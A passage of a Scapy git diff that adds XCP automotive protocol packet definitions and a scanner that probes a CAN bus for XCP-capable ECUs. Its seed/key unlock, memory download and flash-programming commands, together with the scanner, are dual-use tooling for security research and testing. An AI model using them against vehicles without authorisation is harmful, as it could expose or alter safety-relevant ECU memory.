COMMANDS + +class Connect(Packet): + commands = {0x00: "NORMAL", 0x01: "USER_DEFINED"} + fields_desc = [ + ByteEnumField("connection_mode", 0, commands), + ] + + +class Disconnect(Packet): + # DISCONNECT has no data + pass + + +class GetStatus(Packet): + # GET_STATUS has no data + pass + + +class Synch(Packet): + # SYNCH has no data + pass + + +class GetCommModeInfo(Packet): + # GET_COMM_MODE_INFO has no data + pass + + +class GetId(Packet): + """Get identification from slave""" + types = {0x00: "ASCII", + 0x01: "file_name_without_path_and_extension", + 0x02: "file_name_with_path_and_extension", + 0x03: "URL", + 0x04: "File" + } + fields_desc = [ByteEnumField("identification_type", 0x00, types)] + + +class SetRequest(Packet): + """Request to save to non-volatile memory""" + fields_desc = [ + FlagsField("mode", 0, 8, [ + "store_cal_req", "store_daq_req", "clear_daq_req", "x3", "x4", + "x5", "x6", "x7"]), + XCPEndiannessField(ShortField("session_configuration_id", 0x00)) + ] + + +class GetSeed(Packet): + # Get seed for unlocking a protected resource + seed_mode = {0x00: "first", 0x01: "remaining"} + res = {0x00: "resource", 0x01: "ignore"} + fields_desc = [ + ByteEnumField("mode", 0, seed_mode), + ByteEnumField("resource", 0, res) + ] + + +class Unlock(Packet): + # Send key for unlocking a protected resource + fields_desc = [ + FieldLenField("len", None, length_of="seed", fmt="B"), + StrVarLenField("seed", b"", length_from=lambda p: p.len, + max_length=lambda: get_max_cto() - 2) + ] + + +class SetMta(Packet): + # Set Memory Transfer Address in slave + fields_desc = [ + # specification says: position 1,2 type byte (not WORD) The example( + # Part 5 Example Communication Sequences ) shows 2 bytes for + # "reserved" + # http://read.pudn.com/downloads192/doc/comm/903802/XCP%20-Part%205-%20Example%20Communication%20Sequences%20-1.0.pdf # noqa: E501 + # --> 2 bytes + XCPEndiannessField(ShortField("reserved", 0)), + ByteField("address_extension", 0), + XCPEndiannessField(XIntField("address", 0)) + ] + + +class Upload(Packet): + # Upload from slave to master + fields_desc = [ByteField("nr_of_data_elements", 0)] + + +class ShortUpload(Packet): + # Upload from slave to master (short version) + fields_desc = [ + ByteField("nr_of_data_elements", 0), + ByteField("reserved", 0), + XByteField("address_extension", 0), + XCPEndiannessField(IntField("address", 0)) + ] + + +class BuildChecksum(Packet): + # Build checksum over memory range + fields_desc = [ + # specification says: position 1-3 type byte The example(Part 5 + # Example Communication Sequences ) shows 3 bytes for "reserved" + # http://read.pudn.com/downloads192/doc/comm/903802/XCP%20-Part%205-%20Example%20Communication%20Sequences%20-1.0.pdf # noqa: E501 + # --> 3 bytes + XCPEndiannessField(ThreeBytesField("reserved", 0)), + XCPEndiannessField(XIntField("block_size", 0)) + ] + + +class TransportLayerCmd(Packet): + # Refer to transport layer specific command + sub_commands = { + 0xFF: "GET_SLAVE_ID", + 0xFE: "GET_DAQ_ID", + 0xFD: "SET_DAQ_ID", + } + fields_desc = [ + ByteEnumField("sub_command_code", 0xFF, sub_commands), + ] + + +class TransportLayerCmdGetSlaveId(Packet): + echo_mode = { + 0x00: "identify_by_echo", + 0x01: "confirm_by_inverse_echo", + } + + fields_desc = [ + XByteField("x", 0x58), # ASCII = X + XByteField("c", 0x43), # ASCII = C + XByteField("p", 0x50), # ASCII = P + ByteEnumField("mode", 0x00, echo_mode), + ] + + +bind_layers(TransportLayerCmd, TransportLayerCmdGetSlaveId, + sub_command_code=0xFF) + + +class TransportLayerCmdGetDAQId(Packet): + fields_desc = [ + XCPEndiannessField(ShortField("daq_list_number", 0)), + ] + + +bind_layers(TransportLayerCmd, TransportLayerCmdGetDAQId, + sub_command_code=0xFE) + + +class TransportLayerCmdSetDAQId(Packet): + sub_command = { + 0xFD: "SET_DAQ_ID", + } + fields_desc = [ + XCPEndiannessField(ShortField("daq_list_number", 0)), + XCPEndiannessField(IntField("can_identifier", 0)) + ] + + +bind_layers(TransportLayerCmd, TransportLayerCmdSetDAQId, + sub_command_code=0xFD) + + +class UserCmd(Packet): + # Refer to user defined command + fields_desc = [ + ByteField("sub_command_code", 0), + ] + + +# Calibration Commands + +class Download(Packet): + # Download from master to slave + fields_desc = [ + ByteField("nr_of_data_elements", 0), + ConditionalField( + StrLenField("alignment", b"", + length_from=lambda pkt: get_ag() - 2), + lambda pkt: get_ag() > 2), + StrLenField("data_elements", b"", + length_from=lambda pkt: get_max_cto() - 2 if get_ag() == 1 + else get_max_cto() - get_ag()), + ] + + +class DownloadNext(Download): + # Used for the download from master to slave in block mode + # Same as "Download", but with different command code + pass + + +class DownloadMax(Packet): + # Download from master to slave (fixed size) + fields_desc = [ + ConditionalField( + StrLenField("alignment", b"", length_from=lambda _: get_ag() - 1), + lambda _: get_ag() > 1), + StrLenField("data_elements", b"", + length_from=lambda _: get_max_cto() - (get_ag() * 2 - 1)) + ] + + +class ShortDownload(Packet): + # Download from master to slave (short version) + fields_desc = [ + FieldLenField("len", None, length_of="data_elements", fmt="B"), + ByteField("reserved", 0), + ByteField("address_extension", 0), + XCPEndiannessField(IntField("address", 0)), + StrVarLenField("data_elements", b"", length_from=lambda p: p.len, + max_length=lambda: get_max_cto() - 8) + ] + + +class ModifyBits(Packet): + # Modify bits + fields_desc = [ + ByteField("shift_value", 0), + XCPEndiannessField(ShortField("and_mask", 0)), + XCPEndiannessField(ShortField("xor_mask", 0)) + ] + + +# Page Switching commands +class SetCalPage(Packet): + """Set calibration page""" + fields_desc = [ + FlagsField("mode", 0, 8, + ["ecu", "xcp", "x2", "x3", "x4", "x5", "x6", "all"]), + ByteField("data_segment_num", 0), + ByteField("data_page_num", 0) + ] + + +class GetCalPage(Packet): + """Get calibration page""" + fields_desc = [ + ByteField("access_mode", 0), + ByteField("data_segment_num", 0) + ] + + +class GetPagProcessorInfo(Packet): + """Get general information on PAG processor""" + pass + + +class GetSegmentInfo(Packet): + """Get specific information for a SEGMENT""" + info_mode = { + 0x00: "get_basic_address_info", + 0x01: "get_standard_info", + 0x02: "get_address_mapping_info" + } + + fields_desc = [ + ByteEnumField("mode", 0x00, info_mode), + ByteField("segment_number", 0), + ByteField("segment_info", 0), + ByteField("mapping_index", 0) + + ] + + +class GetPageInfo(Packet): + """Get specific information for a PAGE""" + fields_desc = [ + ByteField("reserved", 0), + ByteField("segment_number", 0), + ByteField("page_number", 0) + ] + + +class SetSegmentMode(Packet): + """Set mode for a SEGMENT""" + fields_desc = [ + FlagsField("mode", 0, 8, + ["freeze", "x1", "x2", "x3", "x4", "x5", "x6", "x7"]), + ByteField("segment_number", 0) + ] + + +class GetSegmentMode(Packet): + """Get mode for a SEGMENT""" + fields_desc = [ + ByteField("reserved", 0), + ByteField("segment_number", 0) + ] + + +class CopyCalPage(Packet): + """This command forces the slave to copy one calibration page to another. + This command is only available if more than one calibration page is defined + """ + fields_desc = [ + ByteField("segment_num_src", 0), + ByteField("page_num_src", 0), + ByteField("segment_num_dst", 0), + ByteField("page_num_dst", 0) + ] + + +class SetDaqPtr(Packet): + """Data acquisition and stimulation, static, mandatory""" + fields_desc = [ + ByteField("reserved", 0), + XCPEndiannessField(ShortField("daq_list_num", 0)), + ByteField("odt_num", 0), + ByteField("odt_entry_num", 0) + ] + + +class WriteDaq(Packet): + """Data acquisition and stimulation, static, mandatory""" + fields_desc = [ + ByteField("bit_offset", 0), + ByteField("size_of_daq_element", 0), + ByteField("address_extension", 0), + XCPEndiannessField(IntField("address", 0)) + ] + + +class SetDaqListMode(Packet): + """Set mode for DAQ list""" + fields_desc = [ + FlagsField("mode", 0, 8, + ["x0", "direction", "x2", "x3", "timestamp", "pid_off", + "x6", "x7"]), + XCPEndiannessField(ShortField("daq_list_num", 0)), + XCPEndiannessField(ShortField("event_channel_num", 0)), + ByteField("transmission_rate_prescaler", 0), + ByteField("daq_list_prio", 0) + ] + + +class GetDaqListMode(Packet): + """Get mode from DAQ list""" + fields_desc = [ + ByteField("reserved", 0), + XCPEndiannessField(ShortField("daq_list_number", 0)) + ] + + +class StartStopDaqList(Packet): + """Start/stop/select DAQ list""" + mode_enum = {0x00: "stop", 0x01: "start", 0x02: "select"} + fields_desc = [ + ByteEnumField("mode", 0, mode_enum), + XCPEndiannessField(ShortField("daq_list_number", 0)) + ] + + +class StartStopSynch(Packet): + """Start/stop DAQ lists (synchronously)""" + mode_enum = {0x00: "stop", 0x01: "start", 0x02: "select"} + fields_desc = [ + ByteEnumField("mode", 0x00, mode_enum) + ] + + +class ReadDaq(Packet): + """Read element from ODT entry""" + pass + + +class GetDaqClock(Packet): + """Get DAQ clock from slave""" + pass + + +class GetDaqProcessorInfo(Packet): + """Get general information on DAQ processor""" + pass + + +class GetDaqResolutionInfo(Packet): + """Get general information on DAQ processing resolutioin""" + pass + + +class GetDaqListInfo(Packet): + """Get specific information for a DAQ list""" + fields_desc = [ + ByteField("reserved", 0), + XCPEndiannessField(ShortField("daq_list_num", 0)) + ] + + +class GetDaqEventInfo(Packet): + """Get specific information for an event channel""" + fields_desc = [ + ByteField("reserved", 0), + XCPEndiannessField(ShortField("event_channel_num", 0)) + ] + + # Cyclic data transfer - static configuration commands + + +class ClearDaqList(Packet): + """Clear DAQ list configuration""" + fields_desc = [ + ByteField("reserved", 0), + XCPEndiannessField(ShortField("daq_list_num", 0)) + ] + + +# Cyclic Data transfer - dynamic configuration commands + + +class FreeDaq(Packet): + """Clear dynamic DAQ configuration""" + pass + + +class AllocDaq(Packet): + """Allocate DAQ lists""" + fields_desc = [ + ByteField("reserved", 0), + XCPEndiannessField(ShortField("daq_count", 0)) + ] + + +class AllocOdt(Packet): + """Allocate ODTs to a DAQ list""" + fields_desc = [ + ByteField("reserved", 0), + XCPEndiannessField(ShortField("daq_list_num", 0)), + ByteField("odt_count", 0) + ] + + +class AllocOdtEntry(Packet): + """Allocate ODT entries to an ODT""" + fields_desc = [ + ByteField("reserved", 0), + XCPEndiannessField(ShortField("daq_list_num", 0)), + ByteField("odt_num", 0), + ByteField("odt_entries_count", 0) + ] + + +# Flash Programming commands + +class ProgramStart(Packet): + """Indicate the beginning of a programming sequence""" + pass + + +class ProgramClear(Packet): + """Clear a part of non-volatile memory""" + access_mode = {0x00: "absolute_access", 0x01: "functional_access"} + fields_desc = [ + ByteEnumField("mode", 0, access_mode), + XCPEndiannessField(ShortField("reserved", 0)), + XCPEndiannessField(IntField("clear_range", 0)) + ] + + +class Program(Download): + """Program a non-volatile memory segment""" + # Same structure as "Download", but with different command code + pass + + +class ProgramReset(Packet): + """Indicate the end of a programming sequence""" + pass + + +class GetPgmProcessorInfo(Packet): + """Get general information on PGM processor""" + pass + + +class GetSectorInfo(Packet): + """Get specific information for a SECTOR""" + address_mode = {0x00: "get_address", 0x01: "get_length"} + fields_desc = [ + ByteEnumField("mode", 0, address_mode), + ByteField("sector_number", 0) + ] + + +class ProgramPrepare(Packet): + """Prepare non-volatile memory programming""" + fields_desc = [ + ByteField("not_used", 0), + XCPEndiannessField(ShortField("code_size", 0)) + ] + + +class ProgramFormat(Packet): + """Set data format before programming""" + fields_desc = [ + ByteField("compression_method", 0), + ByteField("encryption_mode", 0), + ByteField("programming_method", 0), + ByteField("access_method", 0) + ] + + +class ProgramNext(Download): + """Program a non-volatile memory segment (Block Mode)""" + # Same structure as "Download", but with different command code + pass + + +class ProgramMax(DownloadMax): + """Program a non-volatile memory segment (fixed size)""" + # Same as "DownloadMax", but with different command code + pass + + +class ProgramVerify(Packet): + """Program Verify""" + start_mode = { + 0x00: "request_to_start_internal_routine", + 0x01: "sending_verification_value" + } + fields_desc = [ + ByteEnumField("verification_mode", 0, start_mode), + XCPEndiannessField(ShortField("verification_type", 0)), + XCPEndiannessField(IntField("verification_value", 0)) + ] diff --git a/scapy/contrib/automotive/xcp/cto_commands_slave.py b/scapy/contrib/automotive/xcp/cto_commands_slave.py new file mode 100644 index 00000000000..905aaff48f1 --- /dev/null +++ b/scapy/contrib/automotive/xcp/cto_commands_slave.py @@ -0,0 +1,479 @@ +# This file is part of Scapy +# See http://www.secdev.org/projects/scapy for more information +# Copyright (C) Tabea Spahn +# This program is published under a GPLv2 license + +# scapy.contrib.status = skip + +from logging import warning + +from scapy.config import conf +from scapy.contrib.automotive.xcp.utils import get_max_cto, get_ag, \ + XCPEndiannessField, StrVarLenField +from scapy.fields import ByteEnumField, ByteField, ShortField, StrLenField, \ + FlagsField, IntField, ThreeBytesField, ConditionalField, XByteField, \ + StrField, LEShortField, XIntField, FieldLenField +from scapy.packet import Packet + + +# ##### CTO COMMANDS ###### + +# STANDARD COMMANDS + +class NegativeResponse(Packet): + """Error Packet""" + error_code_enum = { + 0x00: "ERR_CMD_SYNCH", + 0x10: "ERR_CMD_BUSY", + 0x11: "ERR_DAQ_ACTIVE", + 0x12: "ERR_PGM_ACTIVE", + 0x20: "ERR_CMD_UNKNOWN", + 0x21: "ERR_CMD_SYNTAX", + 0x22: "ERR_OUT_OF_RANGE", + 0x23: "ERR_WRITE_PROTECTED", + 0x24: "ERR_ACCESS_DENIED", + 0x25: "ERR_ACCESS_LOCKED", + 0x26: "ERR_PAGE_NOT_VALID", + 0x27: "ERR_MODE_NOT_VALID", + 0x28: "ERR_SEGMENT_NOT_VALID", + 0x29: "ERR_SEQUENCE", + 0x2A: "ERR_DAQ_CONFIG", + 0x30: "ERR_MEMORY_OVERFLOW", + 0x31: "ERR_GENERIC", + 0x32: "ERR_VERIFY" + } + fields_desc = [ + ByteEnumField("error_code", 0, error_code_enum), + StrField("error_info", "") + ] + + +class GenericResponse(Packet): + """Command Response packet """ + fields_desc = [ + StrField("command_response_data", "") + ] + + +class ConnectPositiveResponse(Packet): + fields_desc = [ + FlagsField("resource", 0, 8, + ["cal_pag", "x1", "daq", "stim", "pgm", "x5", "x6", "x7"]), + FlagsField("comm_mode_basic", 0, 8, + ["byte_order", "address_granularity_0", + "address_granularity_1", "x3", "x4", "x5", + "slave_block_mode", "optional"]), + ByteField("max_cto", 0), + ConditionalField(ShortField("max_dto", 0), + lambda p: p.comm_mode_basic.byte_order), + ConditionalField(LEShortField("max_dto_le", 0), + lambda p: not p.comm_mode_basic.byte_order), + ByteField("xcp_protocol_layer_version_number_msb", 1), + ByteField("xcp_transport_layer_version_number_msb", 1) + ] + + def post_dissection(self, pkt): + if conf.contribs["XCP"]["allow_byte_order_change"]: + new_value = int(self.comm_mode_basic.byte_order) + if new_value != conf.contribs["XCP"]["byte_order"]: + conf.contribs["XCP"]["byte_order"] = new_value + + desc = "Big Endian" if new_value else "Little Endian" + warning("Byte order changed to {0} because of received " + "positive connect packet".format(desc)) + + if conf.contribs["XCP"]["allow_ag_change"]: + conf.contribs["XCP"][ + "Address_Granularity_Byte"] = self.get_address_granularity() + + if conf.contribs["XCP"]["allow_cto_and_dto_change"]: + conf.contribs["XCP"]["MAX_CTO"] = self.max_cto + conf.contribs["XCP"]["MAX_DTO"] = self.max_dto or self.max_dto_le + + def get_address_granularity(self): + comm_mode_basic = self.comm_mode_basic + if not comm_mode_basic.address_granularity_0 and \ + not comm_mode_basic.address_granularity_1: + return 1 + if comm_mode_basic.address_granularity_0 and \ + not comm_mode_basic.address_granularity_1: + return 2 + if not comm_mode_basic.address_granularity_0 and \ + comm_mode_basic.address_granularity_1: + return 4 + else: + warning( + "Getting address granularity from packet failed:" + "both flags are 1") + + +class StatusPositiveResponse(Packet): + fields_desc = [ + FlagsField("current_session_status", 0, 8, + ["store_cal_req", "x1", "store_daq_req", + "clear_daq_request", "x4", "x5", "daq_running", "resume"]), + FlagsField("current_resource_protection_status", 0, 8, + ["cal_pag", "x1", "daq", "stim", "pgm", "x5", "x6", "x7"]), + ByteField("reserved", 0), + XCPEndiannessField(ShortField("session_configuration_id", 0)) + ] + + +class CommonModeInfoPositiveResponse(Packet): + fields_desc = [ + ByteField("reserved1", 0), + FlagsField("comm_mode_optional", 0, 8, + ["master_block_mode", "interleaved_mode", "x2", "x3", "x4", + "x5", "x6", "x7"]), + ByteField("reserved2", 0), + ByteField("max_bs", 0), + ByteField("min_st", 0), + ByteField("queue_size", 0), + ByteField("xcp_driver_version_number", 0), + ] + + +class IdPositiveResponse(Packet): + fields_desc = [ + ByteField("mode", 0), + XCPEndiannessField(ShortField("reserved", 0)), + XCPEndiannessField(FieldLenField("length", None, length_of="element", + fmt="I")), + StrVarLenField("element", b"", length_from=lambda p: p.length, + max_length=lambda pkt: get_ag()) + ] + + +class SeedPositiveResponse(Packet): + fields_desc = [ + FieldLenField("seed_length", None, length_of="seed", fmt="B"), + StrVarLenField("seed", b"", length_from=lambda p: p.seed_length, + max_length=lambda: get_max_cto() - 2) + ] + + +class UnlockPositiveResponse(Packet): + fields_desc = [ + FlagsField("current_resource_protection_status", 0, 8, + ["cal_pag", "x1", "daq", "stim", "pgm", "x5", "x6", "x7"]) + ] + + +class UploadPositiveResponse(Packet): + fields_desc = [ + ConditionalField( + StrLenField("alignment", b"", + length_from=lambda pkt: get_ag() - 1), + lambda _: get_ag() > 1), + StrLenField("element", b"", + length_from=lambda pkt: get_max_cto() - get_ag()), + ] + + +class ShortUploadPositiveResponse(Packet): + fields_desc = [ + ConditionalField( + StrLenField("alignment", b"", + length_from=lambda pkt: get_ag() - 1), + lambda _: get_ag() > 1), + StrLenField("element", b"", + length_from=lambda pkt: get_max_cto() - get_ag()), + ] + + +class ChecksumPositiveResponse(Packet): + checksum_type_dict = { + 0x01: "XCP_ADD_11", + 0x02: "XCP_ADD_12", + 0x03: "XCP_ADD_14", + 0x04: "XCP_ADD_22", + 0x05: "XCP_ADD_24", + 0x06: "XCP_ADD_44", + 0x07: "XCP_CRC_16", + 0x08: "XCP_CRC_16_CITT", + 0x09: "XCP_CRC_32", + 0xFF: "XCP_USER_DEFINED" + } + fields_desc = [ + ByteEnumField("checksum_type", 0, checksum_type_dict), + # specification says: position 2,3 type byte (not WORD) The example( + # Part 5 Example Communication Sequences) shows 2 bytes for + # "reserved" + # http://read.pudn.com/downloads192/doc/comm/903802/XCP%20-Part%205-%20Example%20Communication%20Sequences%20-1.0.pdf # noqa: E501 + # --> 2 bytes + XCPEndiannessField(ShortField("reserved", 0)), + XCPEndiannessField(XIntField("checksum", 0)), + ] + + +class TransportLayerCmdGetSlaveIdResponse(Packet): + fields_desc = [ + XByteField("position_1", 0x58), # 0xA7 (inversed echo) + XByteField("position_2", 0x43), # 0xBC (inversed echo) + XByteField("position_3", 0x50), # 0xAF (inversed echo) + XCPEndiannessField(IntField("can_identifier", 0)) + ] + + +class TransportLayerCmdGetDAQIdResponse(Packet): + can_id_fixed_enum = { + 0x00: "configurable", + 0x01: "fixed" + } + fields_desc = [ + ByteEnumField("can_id_fixed", 0xFE, can_id_fixed_enum), + XCPEndiannessField(ShortField("reserved", 0)), + XCPEndiannessField(IntField("can_identifier", 0)) + ] + + +class CalPagePositiveResponse(Packet): + fields_desc = [ + ByteField("reserved_1", 0), + ByteField("reserved_2", 0), + ByteField("logical_data_page_number", 0), + ] + + +class PagProcessorInfoPositiveResponse(Packet): + fields_desc = [ + ByteField("max_segment", 0), + FlagsField("pag_properties", 0, 8, + ["freeze_supported", "x1", "x2", "x3", "x4", "x5", "x6", + "x7"]), + ] + + +class SegmentInfoMode0PositiveResponse(Packet): + fields_desc = [ + # spec: position 1-3: type byte + # --> take position over type + XCPEndiannessField(ThreeBytesField("reserved", 0)), + XCPEndiannessField(IntField("basic_info", 0)), + ] + + +class SegmentInfoMode1PositiveResponse(Packet): + fields_desc = [ + ByteField("max_pages", 0), + ByteField("address_extension", 0), + ByteField("max_extension", 0), + ByteField("compression_method", 0), + ByteField("encryption_method", 0), + ] + + +class SegmentInfoMode2PositiveResponse(Packet): + fields_desc = [ + # spec: position 1-3: type byte + # --> take position over type + XCPEndiannessField(ThreeBytesField("reserved", 0)), + XCPEndiannessField(IntField("mapping_info", 0)), + ] + + +class PageInfoPositiveResponse(Packet): + fields_desc = [ + FlagsField("page_properties", 0, 8, + ["ecu_access_without_xcp", "ecu_access_with_xcp", + "xcp_read_access_without_ecu", "xcp_read_access_with_ecu", + "xcp_write_access_without_ecu", + "xcp_write_access_with_ecu", "x6", "x7"]), + ByteField("init_segment", 0), + ] + + +class SegmentModePositiveResponse(Packet): + fields_desc = [ + ByteField("reserved", 0), + FlagsField("mode", 0, 8, + ["freeze", "x1", "x2", "x3", "x4", "x5", "x6", "x7"]), + ] + + +class DAQListModePositiveResponse(Packet): + fields_desc = [ + FlagsField("current_mode", 0, 8, + ["selected", "direction", "x2", "x3", "timestamp", + "pid_off", "running", "resume"]), + XCPEndiannessField(ShortField("reserved", 0)), + XCPEndiannessField(ShortField("current_event_channel_number", 0)), + ByteField("current_prescaler", 0), + ByteField("current_daq_list_priority", 0), + ] + + +class StartStopDAQListPositiveResponse(Packet): + fields_desc = [ + ByteField("first_pid", 0), + ] + + +class DAQClockListPositiveResponse(Packet): + fields_desc = [ + # spec: position 1-3: type byte + # --> take position over type + XCPEndiannessField(ThreeBytesField("reserved", 0)), + XCPEndiannessField(IntField("receive_timestamp", 0)) + ] + + +class ReadDAQPositiveResponse(Packet): + fields_desc = [ + ByteField("bit_offset", 0), + ByteField("size_daq_element", 0), + ByteField("address_extension_daq_element", 0), + XCPEndiannessField(IntField("daq_element_address", 0)) + ] + + +class DAQProcessorInfoPositiveResponse(Packet): + fields_desc = [ + FlagsField("daq_properties", 0, 8, + ["daq_config_type", "prescaler_supported", + "resume_supported", "bit_stim_supported", + "timestamp_supported", "pid_off_supported", "overload_msb", + "overload_event"]), + XCPEndiannessField(ShortField("max_daq", 0)), + XCPEndiannessField(ShortField("max_event_channel", 0)), + ByteField("min_daq", 0), + FlagsField("daq_key_byte", 0, 8, + ["optimisation_type_0", "optimisation_type_1", + "optimisation_type_2", "optimisation_type_3", + "address_extension_odt", "address_extension_daq", + "identification_field_type_0", + "identification_field_type_1"]), + ] + + def write_identification_field_type_to_config(self): + conf.contribs["XCP"][ + "identification_field_type_0"] = bool( + self.daq_key_byte.identification_field_type_0) + conf.contribs["XCP"][ + "identification_field_type_1"] = bool( + self.daq_key_byte.identification_field_type_1) + + def post_dissection(self, pkt): + self.write_identification_field_type_to_config() + + +class DAQResolutionInfoPositiveResponse(Packet): + fields_desc = [ + ByteField("granularity_odt_entry_size_daq", 0), + ByteField("max_odt_entry_size_daq", 0), + ByteField("granularity_odt_entry_size_stim", 0), + ByteField("max_odt_entry_size_stim", 0), + FlagsField("timestamp_mode", 0, 8, + ["size_0", "size_1", "size_2", "timestamp_fixed", "unit_0", + "unit_1", "unit_2", "unit_3"]), + XCPEndiannessField(ShortField("timestamp_ticks", 0)), + ] + + def get_timestamp_size(self): + size_0 = bool(self.timestamp_mode.size_0) + size_1 = bool(self.timestamp_mode.size_1) + size_2 = bool(self.timestamp_mode.size_2) + + if not size_2 and not size_1 == 0 and size_0: + return 1 + if not size_2 and size_1 and not size_0: + return 2 + if size_2 and not size_1 and not size_0: + return 4 + return 0 + + def write_timestamp_size_to_config(self): + conf.contribs["XCP"]["timestamp_size"] = self.get_timestamp_size() + + def post_dissection(self, pkt): + self.write_timestamp_size_to_config() + + +class DAQListInfoPositiveResponse(Packet): + fields_desc = [ + FlagsField("daq_list_properties", 0, 8, + ["predefined", "event_fixed", "daq", "stim", "x4", "x5", + "x6", "x7"]), + ByteField("max_odt", 0), + ByteField("max_odt_entries", 0), + XCPEndiannessField(ShortField("fixed_event", 0)), + ] + + +class DAQEventInfoPositiveResponse(Packet): + fields_desc = [ + FlagsField("daq_event_properties", 0, 8, + ["x0", "x1", "daq", "stim", "x4", "x5", "x6", "x7"]), + ByteField("max_daq_list", 0), + ByteField("event_channel_name_length", 0), + ByteField("event_channel_time_cycle", 0), + ByteField("event_channel_time_unit", 0), + ByteField("event_channel_priority", 0), + ] + + +class ProgramStartPositiveResponse(Packet): + fields_desc = [ + ByteField("reserved", 0), + FlagsField("comm_mode_pgm", 0, 8, + ["master_block_mode", "interleaved_mode", "x2", "x3", "x4", + "x5", "slave_block_mode", "x7"]), + ByteField("max_cto_pgm", 0), + ByteField("max_bs_pgm", 0), + ByteField("min_bs_pgm", 0), + ByteField("queue_size_pgm", 0), + ] + + +class PgmProcessorPositiveResponse(Packet): + fields_desc = [ + FlagsField("pgm_properties", 0, 8, + ["absolute_mode", "functional_mode", + "compression_supported", "compression_required", + "encryption_supported", "encryption_required", + "non_seq_pgm_supported", "non_seq_pgm_required"]), + ByteField("max_sector", 0), + ] + + +class SectorInfoPositiveResponse(Packet): + fields_desc = [ + ByteField("clear_sequence_number", 0), + ByteField("program_sequence_number", 0), + ByteField("programming_method", 0), + XCPEndiannessField(IntField("sector_info", 0)) + ] + + +class EvPacket(Packet): + """Event packet""" + event_code_enum = { + 0x00: "EV_RESUME_MODE", + 0x01: "EV_CLEAR_DAQ", + 0x02: "EV_STORE_DAQ", + 0x03: "EV_STORE_CAL", + 0x05: "EV_CMD_PENDING", + 0x06: "EV_DAQ_OVERLOAD", + 0x07: "EV_SESSION_TERMINATED", + 0xFE: "EV_USER", + 0xFF: "EV_TRANSPORT", + } + fields_desc = [ + ByteEnumField("event_code", 0, event_code_enum), + StrLenField("event_information_data", b"", + max_length=lambda _: get_max_cto() - 2) + ] + + +class ServPacket(Packet): + """Service Request packet""" + service_request_code_enum = { + 0x00: "SERV_RESET", + 0x01: "SERV_TEXT", + } + + fields_desc = [ + ByteEnumField("service_request_code", 0, service_request_code_enum), + StrLenField("command_response_data", b"", + max_length=lambda _: get_max_cto() - 2) + ] diff --git a/scapy/contrib/automotive/xcp/scanner.py b/scapy/contrib/automotive/xcp/scanner.py new file mode 100644 index 00000000000..c94efc8ac6c --- /dev/null +++ b/scapy/contrib/automotive/xcp/scanner.py @@ -0,0 +1,152 @@ +# This file is part of Scapy +# See http://www.secdev.org/projects/scapy for more information +# Copyright (C) Tabea Spahn +# This program is published under a GPLv2 license + +# scapy.contrib.description = XCPScanner +# scapy.contrib.status = loads +from collections import namedtuple +from typing import Optional, List, Type, Iterable + +from scapy.config import conf +from scapy.contrib.automotive.xcp.cto_commands_master import \ + TransportLayerCmd, TransportLayerCmdGetSlaveId, Connect +from scapy.contrib.automotive.xcp.cto_commands_slave import \ + ConnectPositiveResponse, TransportLayerCmdGetSlaveIdResponse +from scapy.contrib.automotive.xcp.xcp import CTORequest, XCPOnCAN +from scapy.contrib.cansocket_native import CANSocket + +XCPScannerResult = namedtuple('XCPScannerResult', 'request_id response_id') + + +class XCPOnCANScanner: + """ + Scans for XCP Slave on CAN + """ + + def __init__(self, can_socket, id_range=None, + sniff_time=0.1, add_padding=False, verbose=False): + # type: (CANSocket, Optional[Iterable[int]], Optional[float], Optional[bool], Optional[bool]) -> None # noqa: E501 + + """ + Constructor + :param can_socket: Can Socket with XCPonCAN as basecls for scan + :param id_range: CAN id range to scan + :param sniff_time: time the scan waits for a response + after sending a request + """ + + conf.contribs["XCP"]["add_padding_for_can"] = add_padding + self.__socket = can_socket + self.id_range = id_range or range(0, 0x800) + self.__sniff_time = sniff_time + self.__verbose = verbose + + def _scan(self, identifier, body, pid, answer_type): + # type: (int, CTORequest, int, Type) -> List # noqa: E501 + + self.log_verbose("Scan for id: " + str(identifier)) + flags = 'extended' if identifier >= 0x800 else 0 + cto_request = \ + XCPOnCAN(identifier=identifier, flags=flags) \ + / CTORequest(pid=pid) / body + + req_and_res_list, _unanswered = \ + self.__socket.sr(cto_request, timeout=self.__sniff_time, + verbose=self.__verbose, multi=True) + + if len(req_and_res_list) == 0: + self.log_verbose( + "No answer for identifier: " + str(identifier)) + return [] + + valid_req_and_res_list = filter( + lambda req_and_res: req_and_res[1].haslayer(answer_type), + req_and_res_list) + return list(valid_req_and_res_list) + + def _send_connect(self, identifier): + # type: (int) -> List[XCPScannerResult] + """ + Sends CONNECT Message on the Control Area Network + """ + all_slaves = [] + body = Connect(connection_mode=0x00) + xcp_req_and_res_list = self._scan(identifier, body, 0xFF, + ConnectPositiveResponse) + + for req_and_res in xcp_req_and_res_list: + result = XCPScannerResult(response_id=req_and_res[1].identifier, + request_id=identifier) + all_slaves.append(result) + self.log_verbose( + "Detected XCP slave for broadcast identifier: " + str( + identifier) + "\nResponse: " + str(result)) + + if len(all_slaves) == 0: + self.log_verbose( + "No XCP slave detected for identifier: " + str(identifier)) + return all_slaves + + def _send_get_slave_id(self, identifier): + # type: (int) -> List[XCPScannerResult] + """ + Sends GET_SLAVE_ID message on the Control Area Network + """ + all_slaves = [] + body = TransportLayerCmd() / TransportLayerCmdGetSlaveId() + xcp_req_and_res_list = \ + self._scan( + identifier, body, 0xF2, TransportLayerCmdGetSlaveIdResponse) + + for req_and_res in xcp_req_and_res_list: + response = req_and_res[1] + # The protocol will also mark other XCP messages that might be + # send as TransportLayerCmdGetSlaveIdResponse + # -> Payload must be checked. It must include XCP + if response.position_1 != 0x58 or response.position_2 != 0x43 or \ + response.position_3 != 0x50: + continue + + # Identifier that the master must use to send packets to the slave + # and the slave will answer with + request_id = \ + response["TransportLayerCmdGetSlaveIdResponse"].can_identifier + + result = XCPScannerResult(request_id=request_id, + response_id=response.identifier) + all_slaves.append(result) + self.log_verbose( + "Detected XCP slave for broadcast identifier: " + str( + identifier) + "\nResponse: " + str(result)) + + return all_slaves + + def scan_with_get_slave_id(self): + # type: () -> List[XCPScannerResult] + """Starts the scan for XCP devices on CAN with the transport specific + GetSlaveId Message""" + self.log_verbose("Start scan with GetSlaveId id in range: " + str( + self.id_range)) + + for identifier in self.id_range: + ids = self._send_get_slave_id(identifier) + if len(ids) > 0: + return ids + + return [] + + def scan_with_connect(self): + # type: () -> List[XCPScannerResult] + self.log_verbose("Start scan with CONNECT id in range: " + str( + self.id_range)) + results = [] + for identifier in self.id_range: + result = self._send_connect(identifier) + if len(result) > 0: + results.extend(result) + return results + + def log_verbose(self, output): + if self.__verbose: + print(output) diff --git 